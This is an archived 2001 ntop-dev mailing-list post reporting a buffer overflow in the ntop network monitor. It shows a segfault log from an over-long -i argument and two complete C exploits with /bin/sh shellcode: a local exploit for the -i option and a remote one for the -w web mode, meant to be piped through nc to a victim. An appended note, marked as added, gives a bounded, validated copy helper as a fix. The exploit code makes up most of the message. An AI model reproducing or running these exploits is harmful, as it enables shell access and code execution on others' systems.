
List:       ntop-dev
Subject:    [Ntop-dev] ntop hack:((((((((((((((
From:       <Alexei.Voronine () dvg ! de>
Date:       2001-10-11 7:31:27
Message-ID: OF5AEE0CD3.C790C17E-ONC1256AE2.00289EAB () i001 ! dvg ! sko ! de

Hi,
Look at that!!!

Source
http://www.webdoc.ru/text.phtml?level=2&id=98&script_id=237&url=texts/201-300/237.html

(in Russian; use the online translator on altavista.com)

tshaw:/home/cb/ntop-1.3.2$ ./ntop -i `perl -e 'print "A"x2835'`

24/Oct/2000:12:32:16 ntop v.1.3.2 MT [i686-pc-linux-gnu] (08/11/00 07:04:32 PM build)
24/Oct/2000:12:32:16 Listening on
[AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]
24/Oct/2000:12:32:16 Copyright 1998-2000 by Luca Deri <deri@ntop.org>
24/Oct/2000:12:32:16 Get the freshest ntop from http://www.ntop.org/
24/Oct/2000:12:32:16 Initialising...
Segmentation fault
tshaw:/home/cb/ntop-1.3.2$


EXPLOIT
========

#include <stdlib.h>
#include <string.h>
#include <stdio.h>

#define LEN 208

int main (int argc, char **argv)
{
char buf[LEN + 12];
int ret = 0xbffffba0;
int *p;

char code[]=
"\x31\xdb\xb8\xb7\xaa\xaa\xaa\x25\xb7\x55\x55\x55\x53\x53\xcd\x80"
"\x31\xdb\xb8\x17\xaa\xaa\xaa\x25\x17\x55\x55\x55\x53\x53\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"

"\x80\xe8\xdc\xff\xff\xff/bin/sh";

if (argc > 1) {
ret += atoi(argv[1]);

fprintf(stderr, "Using ret %#010x\n", ret);
}

memset(buf, '\x90', LEN);
memcpy(buf + LEN - strlen(code), code, strlen(code));

p = (int *) (buf + LEN);

*p++ = ret;
*p++ = ret;
*p = 0;

 execl("./ntop", "ntop", "-i", buf, NULL);

}


REMOTE EXPLOIT
=================

#include <stdio.h>
#include <string.h>


char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

void usage()
{
 printf("NTOP ntop-1.2a1 -w mode command execution exploit.\n");
 printf(" mat@hacksware.com\n");
 printf("Usage : ./ntop-w-exp | nc victim port\n");
 exit(0);
}

void main( int argc, char *argv[] )
{
int i,offset=-24;
#define CODE_LEN 240
#define NOP_LEN 50
char code_buf[CODE_LEN];
unsigned long esp=0xbedffb00;

if(argc >= 2) offset = atoi(argv[1]);

memset(code_buf,0x90,NOP_LEN); //insert NOP CODES
memcpy(code_buf+NOP_LEN, shellcode, strlen(shellcode));
for(i=strlen(shellcode)+NOP_LEN;i<=CODE_LEN;i+=4)
 *(long *)&code_buf[i]=(unsigned long)esp-offset;

printf("GET /");
for(i=0;i<CODE_LEN; i++)
{
 putchar(code_buf[i]);
}
printf("\r\n\r\n");
}



Kind regards

Alexei Voronine

dvg Hannover
OE352 UNIX Server Control Center (USCC)
e-Mail   Alexei.Voronine@dvg.de
Tel:       0511-5102-3703
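
Added example, not part of the original message and not ntop's own code: the crash above comes from an over-long -i argument, so this sketch shows the kind of bounded, validated copy that rejects such input before it reaches a fixed-size buffer. The helper name copy_ifname and the limit IFNAME_MAX (set to the size of Linux IFNAMSIZ) are assumptions made for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define IFNAME_MAX 16   /* assumption: same size as Linux IFNAMSIZ, incl. NUL */

/* Hypothetical helper: copy a user-supplied interface name into a fixed
 * buffer only if it fits and contains only device-name characters.
 * Returns 0 on success, -1 if rejected (dst is then an empty string). */
int copy_ifname(char dst[IFNAME_MAX], const char *src)
{
    size_t len = 0;

    dst[0] = '\0';
    if (src == NULL)
        return -1;

    /* Bounded length probe: never reads more than IFNAME_MAX bytes. */
    while (len < IFNAME_MAX && src[len] != '\0')
        len++;
    if (len == 0 || len >= IFNAME_MAX)
        return -1;                      /* empty, or would not fit */

    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)src[i];
        if (!isalnum(c) && c != '.' && c != '_' && c != '-' && c != ':')
            return -1;                  /* binary or control bytes */
    }
    memcpy(dst, src, len + 1);          /* len + 1 <= IFNAME_MAX */
    return 0;
}

int main(void)
{
    char name[IFNAME_MAX], big[2836];

    /* Constructed input: same shape as the 2835-byte argument above. */
    memset(big, 'A', 2835);
    big[2835] = '\0';
    printf("eth0     -> %d\n", copy_ifname(name, "eth0"));
    printf("2835 x A -> %d\n", copy_ifname(name, big));
    return 0;
}
```

The same length-then-copy pattern applies to the request line read in -w mode: reject anything longer than the destination buffer before copying.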


